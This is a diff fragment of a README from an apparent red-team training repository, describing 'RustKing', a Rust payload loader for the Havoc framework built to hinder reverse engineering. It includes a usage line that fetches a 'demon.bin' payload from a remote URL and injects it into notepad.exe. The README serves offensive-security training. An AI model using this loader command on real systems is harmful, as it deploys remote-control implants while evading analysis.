WesleyWong420/RedTeamOps-Havoc-101/README.md

 ```

 ### RustKing
 RustKing is an adapted version of `RatKing` on steroids, written in Rust.
+The intention is to make Reverse Engineering significantly harder only.

 **NOTE:** RustKing does not support HTTPS payload download and PPID spoofing.
-Additionally, target process has to be opened manually prior to running RustKing.
+Additionally, target process has to be opened manually prior to running RustKing. `--target` must be exact match.
 ```
 C:\>RustKing.exe --url http://192.168.231.128:9090/demon.bin --target notepad.exe